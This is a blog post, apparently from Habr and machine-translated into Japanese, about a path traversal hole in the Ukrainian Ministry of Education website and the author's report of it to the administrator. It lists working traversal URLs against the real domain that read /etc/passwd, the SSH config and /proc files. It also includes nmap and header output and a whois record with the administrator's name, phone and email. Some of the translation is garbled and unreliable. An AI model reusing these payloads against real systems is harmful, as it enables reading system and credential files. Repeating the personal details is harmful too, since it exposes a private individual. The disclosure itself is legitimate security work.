ウクライナ教育科学省...教育2.0話す？

今日、仲間は興味深いリンクを共有しました

• www.mon.gov.ua/main.php?query=../../../etc/passwd

見るのは面白くなりましたが、何が開かれていますか？

複雑でない：

  $ nmap www.mon.gov.ua

 2010-04-09 10:40 EESTにNmap 4.11（http://www.insecure.org/nmap/）を開始
 212.111.193.189の興味深いポート：
表示されていません：1679個のフィルタリングされたポート
ポートステートサービス
 80 / TCPオープンHTTP

 Nmapの終了：76.253秒で1つのIPアドレス（1つのホストが起動）がスキャンされました 

まあ...またオプション...ポート80とのみ...申し訳ありません...

 $ w3m -dump_head www.mon.gov.ua
 HTTP / 1.1 200 OK
日付：2010年4月9日金曜日07:43:50 GMT
サーバー：Apache / 2.2.6（Fedora）
 X-Powered-By：PHP / 5.1.6
接続：閉じる
コンテンツタイプ：テキスト/ html

それでは、ちょうど研究の興奮が爆発し始めました。

• www.mon.gov.ua/main.php?query=../../../etc/rc
• www.mon.gov.ua/main.php?query=../../../etc/rc.local
• www.mon.gov.ua/main.php?query=../../../etc/ssh/ssh_config
• www.mon.gov.ua/main.php?query=../../../proc/cpuinfo
• www.mon.gov.ua/main.php?query=../../../proc/meminfo

私はこれで停止することに決めました...私は停止し、ダイヤルしました：

  $ whois mon.gov.ua
 ％これは、ウクライナのWhoisクエリサーバー#Fです。
著作権により制限される権利。
 ％


 %% .UA whois
 ％ドメインレコード：
 ％==============
ドメイン：mon.gov.ua
 admin-c：AVB40-UANIC
 tech-c：AVB40-UANIC
ステータス：OK-UNTIL 20100605000000
 nserver：ns.secondary.net.ua
 nserver：ns.mon.gov.ua
発言：ウクライナ教育科学省
発言：ウクライナ生態科学省
変更：UARR149-UANIC 20090713150319
ソース：UANIC


 ％接着剤レコード：
 ％=============
 nserver：ns.mon.gov.ua
 ip-addr：88.81.234.94

 ％管理連絡先：
 ％========================
 nic-handle：AVB40-UANIC
人物：アナトリー・ヴァレンティノヴィッチ・ボルトニコフ
住所：Shevchenko Taras、16
住所：01601 KIEV
住所：UA
電話番号：+380（44）2463909
電子メール：irvin@mon.gov.ua
 mnt-by：なし
変更：AVB40-UANIC 20090710174047
ソース：UANIC

 ％技術連絡先：
 ％==================
 nic-handle：AVB40-UANIC
人物：アナトリー・ヴァレンティノヴィッチ・ボルトニコフ
住所：Shevchenko Taras、16
住所：01601 KIEV
住所：UA
電話番号：+380（44）2463909
電子メール：irvin@mon.gov.ua
 mnt-by：なし
変更：AVB40-UANIC 20090710174047
ソース：UANIC


 %% .UA whois

私は電話をしました...私は自己紹介をしました（そして誰から隠すのか、そしてなぜですか？） 伝えようとしました 彼らにそのような穴があると聞いたが、それは危険をもたらさない、それは読み取り専用である、など。 まあ、私は単に答えました：「はい（？）、まあ、大丈夫」...

それから彼はすでにこの穴が「 昼食時に百歳 」であると見ていました。 まあ、そのようなことは誰も気にしないので、なぜ彼らは私を気にしなければならないのですか、本当にもっと必要ですか？

しかし、ここに私が考えたことがあります。 原則として、これは重要なサイトではなく、重要なプロジェクトでもありません。 しかし、2年以内に人々が怠removeすぎて穴を削除できない場合（脆弱性について話しているわけではありません）、突然他の重要な教育プロジェクトや他のプロジェクトが実装され始めたらどうなりますか？ 彼らはいくつかの研究所がサイトを開発していると言ったが、私は考えた：何人かの学生がセッションに合格した！ :(これはすべて悲しいです...

UPD：すでにこのテーマが少し明らかになったハブラーに表示されます...
UPD：サイトの穴は覆われたと言われています。 彼らはhabroeffectを感じた直後に文字通りカバーしました：

情報をありがとう！
私たちのプログラマーはすでにコードをやっています...

残念ながら今日は時間がありません。事実は、サイトの作者が2年前に辞めたことです...

とりあえず、週末にサイトがクラッシュしないように、攻撃された（約2500）アドレスのリスト全体をファイアウォールでシャットダウンする必要があります。
私はそのdecisionい決定を理解していますが、一時的にそうです。

Habrのおかげで、私たちはこの世界をより良くします！